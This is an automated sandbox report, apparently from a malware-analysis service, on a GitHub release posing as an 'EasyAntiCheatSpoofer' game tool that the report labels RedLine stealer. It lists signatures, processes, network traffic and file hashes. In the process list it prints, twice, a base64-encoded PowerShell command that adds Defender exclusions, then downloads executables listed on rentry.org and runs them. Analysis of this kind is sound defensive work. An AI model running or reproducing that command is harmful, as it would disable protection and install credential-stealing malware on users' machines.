Analysis Overview
Threat Level: Known bad
The file https://github.com/SpooKie001/EasyAntiCheatSpoofer/releases/tag/v2.0 was found to be: Known bad.
Malicious Activity Summary
RedLine
RedLine payload
Blocklisted process makes network request
Downloads MZ/PE file
Checks computer location settings
Executes dropped EXE
Legitimate hosting services abused for malware hosting/C2
Command and Scripting Interpreter: PowerShell
Enumerates physical storage devices
Opens file in notepad (likely ransom note)
Modifies registry class
Uses Task Scheduler COM API
Suspicious use of WriteProcessMemory
Suspicious behavior: EnumeratesProcesses
Suspicious use of FindShellTrayWindow
Suspicious use of SendNotifyMessage
Checks processor information in registry
NTFS ADS
Suspicious use of AdjustPrivilegeToken
Suspicious use of SetWindowsHookEx
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-07-05 12:01
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2024-07-05 12:01
Reported
2024-07-05 12:03
Platform
win10v2004-20240704-en
Max time kernel
92s
Max time network
93s
Command Line
Signatures
RedLine
RedLine payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Downloads MZ/PE file
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-2547232018-1419253926-3356748848-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\Downloads\Loader\Loader\Loader\Loader.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2547232018-1419253926-3356748848-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\Downloads\Loader\Loader\Loader\Loader.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\Downloads\Loader\Loader\Loader\Loader.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\1o35kcks.mos0.exe | N/A |
| N/A | N/A | C:\Users\Admin\Downloads\Loader\Loader\Loader\Loader.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\by5vay5m.g2w0.exe | N/A |
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | bitbucket.org | N/A | N/A |
| N/A | bitbucket.org | N/A | N/A |
| N/A | bitbucket.org | N/A | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Enumerates physical storage devices
Checks processor information in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-2547232018-1419253926-3356748848-1000_Classes\Local Settings | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
NTFS ADS
| Description | Indicator | Process | Target |
| File created | C:\Users\Admin\Downloads\Loader.rar:Zone.Identifier | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
Opens file in notepad (likely ransom note)
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\NOTEPAD.EXE | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\1o35kcks.mos0.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\1o35kcks.mos0.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\1o35kcks.mos0.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\1o35kcks.mos0.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\by5vay5m.g2w0.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\by5vay5m.g2w0.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\by5vay5m.g2w0.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\by5vay5m.g2w0.exe | N/A |
Suspicious use of AdjustPrivilegeToken
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| N/A | N/A | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| N/A | N/A | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| N/A | N/A | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| N/A | N/A | C:\Program Files\7-Zip\7zG.exe | N/A |
| N/A | N/A | C:\Program Files\7-Zip\7zG.exe | N/A |
Suspicious use of SendNotifyMessage
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| N/A | N/A | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| N/A | N/A | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| N/A | N/A | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| N/A | N/A | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| N/A | N/A | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
Processes
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -osint -url "https://github.com/SpooKie001/EasyAntiCheatSpoofer/releases/tag/v2.0"
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -osint -url https://github.com/SpooKie001/EasyAntiCheatSpoofer/releases/tag/v2.0
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="5012.0.527084949\1613734575" -parentBuildID 20230214051806 -prefsHandle 1768 -prefMapHandle 1760 -prefsLen 22076 -prefMapSize 235121 -appDir "C:\Program Files\Mozilla Firefox\browser" - {e4f84c0e-7480-4613-ba3d-cef26519126c} 5012 "\\.\pipe\gecko-crash-server-pipe.5012" 1856 234e012cb58 gpu
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="5012.1.1920008057\1169986474" -parentBuildID 20230214051806 -prefsHandle 2436 -prefMapHandle 2432 -prefsLen 22927 -prefMapSize 235121 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {e94f028e-cdc4-423e-9b32-3677db383c20} 5012 "\\.\pipe\gecko-crash-server-pipe.5012" 2460 234d3389258 socket
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="5012.2.415473037\139470982" -childID 1 -isForBrowser -prefsHandle 3080 -prefMapHandle 3096 -prefsLen 22965 -prefMapSize 235121 -jsInitHandle 1248 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {4e9eb706-ee3d-43bf-950e-9f36d5a646c2} 5012 "\\.\pipe\gecko-crash-server-pipe.5012" 3036 234e311ff58 tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="5012.3.2095714897\937639227" -childID 2 -isForBrowser -prefsHandle 4084 -prefMapHandle 4080 -prefsLen 27616 -prefMapSize 235121 -jsInitHandle 1248 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {23ce2ee5-1004-49a1-b39e-ea24b9a06fe8} 5012 "\\.\pipe\gecko-crash-server-pipe.5012" 4100 234e4cbdb58 tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="5012.4.756333170\2126709632" -childID 3 -isForBrowser -prefsHandle 5308 -prefMapHandle 5232 -prefsLen 27697 -prefMapSize 235121 -jsInitHandle 1248 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {866ab400-8821-451b-b372-b15f47e37e1d} 5012 "\\.\pipe\gecko-crash-server-pipe.5012" 5144 234e6ceb658 tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="5012.5.1702434776\245979945" -childID 4 -isForBrowser -prefsHandle 5132 -prefMapHandle 5208 -prefsLen 27697 -prefMapSize 235121 -jsInitHandle 1248 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {ee871d58-a898-48a9-a16b-1a4a794f8c69} 5012 "\\.\pipe\gecko-crash-server-pipe.5012" 5404 234e6cebc58 tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="5012.6.1196295877\601383613" -childID 5 -isForBrowser -prefsHandle 5592 -prefMapHandle 5224 -prefsLen 27697 -prefMapSize 235121 -jsInitHandle 1248 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {c13dc281-d9be-4a8e-ba44-2376bd133ae4} 5012 "\\.\pipe\gecko-crash-server-pipe.5012" 5580 234e7153c58 tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="5012.7.300899981\157606403" -childID 6 -isForBrowser -prefsHandle 4232 -prefMapHandle 3904 -prefsLen 27697 -prefMapSize 235121 -jsInitHandle 1248 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {73115db5-ef6c-403c-a1bb-ea5a182abfdc} 5012 "\\.\pipe\gecko-crash-server-pipe.5012" 4340 234d3341458 tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="5012.8.1686905581\442434155" -childID 7 -isForBrowser -prefsHandle 2776 -prefMapHandle 1504 -prefsLen 27776 -prefMapSize 235121 -jsInitHandle 1248 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {14a4a379-4515-4014-a012-8c71e50f64f2} 5012 "\\.\pipe\gecko-crash-server-pipe.5012" 6012 234e691ab58 tab
C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
C:\Program Files\7-Zip\7zG.exe
"C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\Downloads\Loader\" -spe -an -ai#7zMap25888:74:7zEvent30972
C:\Windows\system32\NOTEPAD.EXE
"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\Downloads\Loader\password.txt
C:\Program Files\7-Zip\7zG.exe
"C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\Downloads\Loader\Loader\" -spe -an -ai#7zMap1939:88:7zEvent7223
C:\Users\Admin\Downloads\Loader\Loader\Loader\Loader.exe
"C:\Users\Admin\Downloads\Loader\Loader\Loader\Loader.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAagBzACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAdQBpAGUAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAaABmAHQAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAeQBmAGcAIwA+ADsAJAB3AGMAIAA9ACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkAOwAkAGwAbgBrACAAPQAgACQAdwBjAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AcgBlAG4AdAByAHkALgBvAHIAZwAvAGQAZQB2ADUAMQA1ADEAMgA1ADEAMgAvAHIAYQB3ACcAKQAuAFMAcABsAGkAdAAoAFsAcwB0AHIAaQBuAGcAWwBdAF0AIgBgAHIAYABuACIALAAgAFsAUwB0AHIAaQBuAGcAUwBwAGwAaQB0AE8AcAB0AGkAbwBuAHMAXQA6ADoATgBvAG4AZQApADsAIAAkAGYAbgAgAD0AIABbAFMAeQBzAHQAZQBtAC4ASQBPAC4AUABhAHQAaABdADoAOgBHAGUAdABSAGEAbgBkAG8AbQBGAGkAbABlAE4AYQBtAGUAKAApADsAIABmAG8AcgAgACgAJABpAD0AMAA7ACAAJABpACAALQBsAHQAIAAkAGwAbgBrAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAIAAkAHcAYwAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJABsAG4AawBbACQAaQBdACwAIAA8ACMAYgByAGIAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwByAG4AegAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAVABlAG0AcAAgADwAIwBnAGoAaQAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAKAAkAGYAbgAgACsAIAAkAGkALgBUAG8AUwB0AHIAaQBuAGcAKAApACAAKwAgACcALgBlAHgAZQAnACkAKQApACAAfQA8ACMAawBlAHEAIwA+ADsAIABmAG8AcgAgACgAJABpAD0AMAA7ACAAJABpACAALQBsAHQAIAAkAGwAbgBrAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAA8ACMAZgB5AHoAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBUAGUAbQBwACAAPAAjAHoAcgBhACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAoACQAZgBuACAAKwAgACQAaQAuAFQAbwBTAHQAcgBpAG4AZwAoACkAIAArACAAJwAuAGUAeABlACcAKQApACAAfQAgADwAIwB3AHkAeAAjAD4A"
C:\Users\Admin\AppData\Local\Temp\1o35kcks.mos0.exe
"C:\Users\Admin\AppData\Local\Temp\1o35kcks.mos0.exe"
C:\Users\Admin\Downloads\Loader\Loader\Loader\Loader.exe
"C:\Users\Admin\Downloads\Loader\Loader\Loader\Loader.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAagBzACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAdQBpAGUAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAaABmAHQAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAeQBmAGcAIwA+ADsAJAB3AGMAIAA9ACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkAOwAkAGwAbgBrACAAPQAgACQAdwBjAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AcgBlAG4AdAByAHkALgBvAHIAZwAvAGQAZQB2ADUAMQA1ADEAMgA1ADEAMgAvAHIAYQB3ACcAKQAuAFMAcABsAGkAdAAoAFsAcwB0AHIAaQBuAGcAWwBdAF0AIgBgAHIAYABuACIALAAgAFsAUwB0AHIAaQBuAGcAUwBwAGwAaQB0AE8AcAB0AGkAbwBuAHMAXQA6ADoATgBvAG4AZQApADsAIAAkAGYAbgAgAD0AIABbAFMAeQBzAHQAZQBtAC4ASQBPAC4AUABhAHQAaABdADoAOgBHAGUAdABSAGEAbgBkAG8AbQBGAGkAbABlAE4AYQBtAGUAKAApADsAIABmAG8AcgAgACgAJABpAD0AMAA7ACAAJABpACAALQBsAHQAIAAkAGwAbgBrAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAIAAkAHcAYwAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJABsAG4AawBbACQAaQBdACwAIAA8ACMAYgByAGIAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwByAG4AegAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAVABlAG0AcAAgADwAIwBnAGoAaQAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAKAAkAGYAbgAgACsAIAAkAGkALgBUAG8AUwB0AHIAaQBuAGcAKAApACAAKwAgACcALgBlAHgAZQAnACkAKQApACAAfQA8ACMAawBlAHEAIwA+ADsAIABmAG8AcgAgACgAJABpAD0AMAA7ACAAJABpACAALQBsAHQAIAAkAGwAbgBrAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAA8ACMAZgB5AHoAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBUAGUAbQBwACAAPAAjAHoAcgBhACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAoACQAZgBuACAAKwAgACQAaQAuAFQAbwBTAHQAcgBpAG4AZwAoACkAIAArACAAJwAuAGUAeABlACcAKQApACAAfQAgADwAIwB3AHkAeAAjAD4A"
C:\Users\Admin\AppData\Local\Temp\by5vay5m.g2w0.exe
"C:\Users\Admin\AppData\Local\Temp\by5vay5m.g2w0.exe"
Network
| Country | Destination | Domain | Proto |
| N/A | 127.0.0.1:62974 | tcp | |
| US | 8.8.8.8:53 | github.com | udp |
| US | 8.8.8.8:53 | contile.services.mozilla.com | udp |
| US | 8.8.8.8:53 | spocs.getpocket.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | github.com | udp |
| US | 34.117.188.166:443 | spocs.getpocket.com | udp |
| US | 8.8.8.8:53 | contile.services.mozilla.com | udp |
| US | 34.117.188.166:443 | contile.services.mozilla.com | udp |
| US | 8.8.8.8:53 | prod.ads.prod.webservices.mozgcp.net | udp |
| US | 8.8.8.8:53 | content-signature-2.cdn.mozilla.net | udp |
| US | 8.8.8.8:53 | github.com | udp |
| US | 8.8.8.8:53 | contile.services.mozilla.com | udp |
| US | 34.117.188.166:443 | prod.ads.prod.webservices.mozgcp.net | tcp |
| US | 34.117.188.166:443 | prod.ads.prod.webservices.mozgcp.net | tcp |
| US | 8.8.8.8:53 | shavar.services.mozilla.com | udp |
| US | 8.8.8.8:53 | push.services.mozilla.com | udp |
| US | 8.8.8.8:53 | prod.content-signature-chains.prod.webservices.mozgcp.net | udp |
| US | 8.8.8.8:53 | firefox.settings.services.mozilla.com | udp |
| US | 34.160.144.191:443 | prod.content-signature-chains.prod.webservices.mozgcp.net | tcp |
| US | 8.8.8.8:53 | prod.ads.prod.webservices.mozgcp.net | udp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 52.33.222.107:443 | shavar.services.mozilla.com | tcp |
| US | 8.8.8.8:53 | shavar.prod.mozaws.net | udp |
| US | 8.8.8.8:53 | prod.content-signature-chains.prod.webservices.mozgcp.net | udp |
| US | 34.107.243.93:443 | push.services.mozilla.com | tcp |
| US | 34.149.100.209:443 | firefox.settings.services.mozilla.com | tcp |
| US | 8.8.8.8:53 | autopush.prod.mozaws.net | udp |
| US | 8.8.8.8:53 | shavar.prod.mozaws.net | udp |
| US | 8.8.8.8:53 | prod.remote-settings.prod.webservices.mozgcp.net | udp |
| US | 8.8.8.8:53 | prod.remote-settings.prod.webservices.mozgcp.net | udp |
| US | 8.8.8.8:53 | autopush.prod.mozaws.net | udp |
| US | 34.107.243.93:443 | autopush.prod.mozaws.net | tcp |
| US | 8.8.8.8:53 | getpocket.cdn.mozilla.net | udp |
| US | 34.120.5.221:443 | getpocket.cdn.mozilla.net | tcp |
| US | 8.8.8.8:53 | prod.pocket.prod.cloudops.mozgcp.net | udp |
| US | 8.8.8.8:53 | prod.pocket.prod.cloudops.mozgcp.net | udp |
| US | 8.8.8.8:53 | github.githubassets.com | udp |
| US | 34.149.100.209:443 | prod.remote-settings.prod.webservices.mozgcp.net | tcp |
| US | 185.199.110.154:443 | github.githubassets.com | tcp |
| US | 185.199.110.154:443 | github.githubassets.com | tcp |
| US | 185.199.110.154:443 | github.githubassets.com | tcp |
| US | 185.199.110.154:443 | github.githubassets.com | tcp |
| US | 185.199.110.154:443 | github.githubassets.com | tcp |
| US | 185.199.110.154:443 | github.githubassets.com | tcp |
| US | 8.8.8.8:53 | github.githubassets.com | udp |
| US | 8.8.8.8:53 | github.githubassets.com | udp |
| US | 34.149.100.209:443 | prod.remote-settings.prod.webservices.mozgcp.net | tcp |
| US | 8.8.8.8:53 | 107.222.33.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 154.110.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | avatars.githubusercontent.com | udp |
| US | 185.199.109.133:443 | avatars.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | avatars.githubusercontent.com | udp |
| US | 8.8.8.8:53 | avatars.githubusercontent.com | udp |
| US | 8.8.8.8:53 | 133.109.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | collector.github.com | udp |
| US | 140.82.114.22:443 | collector.github.com | tcp |
| US | 140.82.114.22:443 | collector.github.com | tcp |
| US | 8.8.8.8:53 | glb-db52c2cf8be544.github.com | udp |
| US | 8.8.8.8:53 | glb-db52c2cf8be544.github.com | udp |
| US | 8.8.8.8:53 | 22.114.82.140.in-addr.arpa | udp |
| N/A | 127.0.0.1:62980 | tcp | |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 204.79.197.237:443 | g.bing.com | tcp |
| US | 8.8.8.8:53 | 2.159.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 237.197.79.204.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 57.169.31.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | www.google.com | udp |
| GB | 142.250.180.4:443 | www.google.com | tcp |
| US | 8.8.8.8:53 | www.google.com | udp |
| US | 8.8.8.8:53 | www.google.com | udp |
| GB | 142.250.180.4:443 | www.google.com | udp |
| US | 8.8.8.8:53 | 99.201.58.216.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 227.187.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 50.23.12.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 171.39.242.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.214.232.199.in-addr.arpa | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.109.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 8.8.8.8:53 | rentry.org | udp |
| FR | 164.132.58.105:443 | rentry.org | tcp |
| US | 8.8.8.8:53 | bitbucket.org | udp |
| US | 104.192.141.1:443 | bitbucket.org | tcp |
| US | 8.8.8.8:53 | 105.58.132.164.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 1.141.192.104.in-addr.arpa | udp |
| FR | 164.132.58.105:443 | rentry.org | tcp |
| US | 104.192.141.1:443 | bitbucket.org | tcp |
| US | 8.8.8.8:53 | 73.144.22.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 11.227.111.52.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\vg8iw5f0.default-release\activity-stream.discovery_stream.json.tmp
| MD5 | 2598e5b4dccaf42ca1e6b7d4b3895c44 |
| SHA1 | 5b5f08dcc8908ceae1406c75cd6260bff59a9f8f |
| SHA256 | df723479628d62419aadeeb5416f0e25f5fec9a871af86b51cfd2d07d5a3aaf6 |
| SHA512 | 092955090e0662d95d74201b46c42b8a6ac348925c05cb1f5c2bf365ff2307c2a0d6fb10af7f200b796acea5ddc4314f73c502b824398b0801358146197a374c |
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\vg8iw5f0.default-release\activity-stream.discovery_stream.json.tmp
| MD5 | dc57db19f0de72dcbbf1a04ff0f5e86d |
| SHA1 | 80a4c97bb24b6955ba50c30593dd85098dbdfd76 |
| SHA256 | d2bbea9a66e658febfc98b914d86f5b30b89af6a36cf75486d548e0bbc6a8ad6 |
| SHA512 | 38dad3701b91ad8040d505531493c743ac4b412b9b2e5fa58a17155fa25f24f44ad380f1fbf60409f5d387ce75f8fe9b94887fd24daed5f2dcc4d11fafe49276 |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\vg8iw5f0.default-release\prefs.js
| MD5 | 0b76dc8627f91f2e50fe09ce39761b7e |
| SHA1 | 79388afe6894ba09580c6973d787ed84d5ff4129 |
| SHA256 | 8d1b7523a22eea9b4f68fe569b2adf426d6eb19c6c5e8dda05dd3e81bc546cfa |
| SHA512 | 16927a3ada01e3a1f748083fd61fc9fbcbde1cbb7707259a131162918a504692584b79187e2da1d738eda6ed53f90f215c7180a300315d369dd4c732c65fa60c |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\vg8iw5f0.default-release\prefs-1.js
| MD5 | a66905362a294093677fe2ec5ae87b17 |
| SHA1 | c4c2099ee3afbc57c6734e0e6b64e188d341dc57 |
| SHA256 | 5c6e75319e199c322b9a139261a0babb495dc4b2c6220a4e4aff14e12fcb0583 |
| SHA512 | 3e4d88009c27960453379dc3b1ac1f7be3a00d9836349fef6c356341711c2d6abaed36b3d82c336f4eab2429f4d42afc756f15bd34d04d803270db28d0809f94 |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\vg8iw5f0.default-release\sessionstore-backups\recovery.jsonlz4
| MD5 | e1ab55dc19fe8e6bac19e6f80f334211 |
| SHA1 | affbf49b668d04777eadf532691bdcb88a70c404 |
| SHA256 | fa652a3f758fc1fb67a76e3ce6b7028420fdecc78c281c56e81f97cf79902111 |
| SHA512 | ca121c3ca2c8d69a09805019ba0060bd21a75b9cbd532a483e57b430f611dad38785f6f2bb0f38132173ed2c8ec0a6d012226c52bdf95b0be2f44792c0c4ef79 |
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\vg8iw5f0.default-release\cache2\entries\2547F4F8D6358638CDE0B31A1322D63360CA032C
| MD5 | fac8e728a7e936d520d0233ac95a075d |
| SHA1 | 6c64540574720a1b41c198e31d2330a77020b0f0 |
| SHA256 | 58abff0a97f5fdb2d20b85f60634db25ad0e90c1b9883068cdaef1fc6e9f53d0 |
| SHA512 | fa842dfe13509548fda0a73a81c014f16813a2cca19755b59b326f28bcf19f05928e1018b31a208c80fab2633f3e6a7fd0df13ad48f45b4a01ea2e5af999fdb3 |
